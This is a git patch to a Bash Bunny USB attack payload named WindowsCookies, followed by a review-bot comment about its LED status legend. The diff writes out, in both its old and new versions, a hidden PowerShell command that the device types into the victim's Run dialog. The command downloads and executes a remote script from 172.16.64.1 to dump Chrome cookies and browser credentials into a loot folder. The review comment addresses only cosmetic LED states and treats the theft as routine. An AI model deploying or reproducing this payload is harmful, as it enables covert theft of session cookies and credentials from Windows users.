From e0ed65ad9b58a45a26c1b23d2ec8a7bcb9365e86 Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Fri, 7 Apr 2017 16:56:17 +1000
Subject: [PATCH] Updated WindowsCookies payload for Bash Bunny v1.1
---
 payloads/library/WindowsCookies/payload.txt | 23 ++++++++-------------
 1 file changed, 9 insertions(+), 14 deletions(-)
diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt
index d87ad3e2..085416a9 100644
--- a/payloads/library/WindowsCookies/payload.txt
+++ b/payloads/library/WindowsCookies/payload.txt
@@ -10,33 +10,28 @@
 # https://github.com/sekirkity/BrowserGather BrowserGather.ps1
 # https://github.com/EmpireProject/Empire Get-FoxDump.ps1
 # Also credit to illwill for the BrowerCreds payload
-
-#script
+#
+# LED States
+# Setup.............Setup
 # Blue..............Running Script
 # White.............Setup RNDIS_ETHERNET
 # Green.............Got Browser Creds
-LED B 200
-source bunny_helpers.sh
-# QUACK SET_LANGUAGE gb
-DUCKY_LANG='fr'
+LED SETUP
 LOOTDIR=/root/udisk/loot/FacebookSession
 mkdir -p $LOOTDIR
-
 ATTACKMODE HID
-
+LED STAGE1
+GET SWITCH_POSITION
 cd /root/udisk/payloads/$SWITCH_POSITION/
 ./server.py &
 sleep 1
 #Dump Chrome Cookies
-Q GUI r
-Q DELAY 100
-Q STRING "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
-Q ENTER
+RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
-LED R G B 100
+LED STAGE2
 ATTACKMODE RNDIS_ETHERNET
-LED G 100
+LED FINISH
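Review bot: The LED legend in the header comment does not describe the calls this patch introduces: it keeps the old `Blue`/`White`/`Green` rows and adds `# Setup.............Setup`, while the body now calls `LED SETUP`, `LED STAGE1`, `LED STAGE2` and `LED FINISH`. I would replace the legend with one row per new state (SETUP, STAGE1, STAGE2, FINISH), each saying what the script is doing at that point. The `Green.............Got Browser Creds` row is also misleading as kept: `LED FINISH` is issued unconditionally right after `ATTACKMODE RNDIS_ETHERNET`, so it shows only that the script reached its last line. The hunk covers the file from line 10 on; the top of the header comment is outside it.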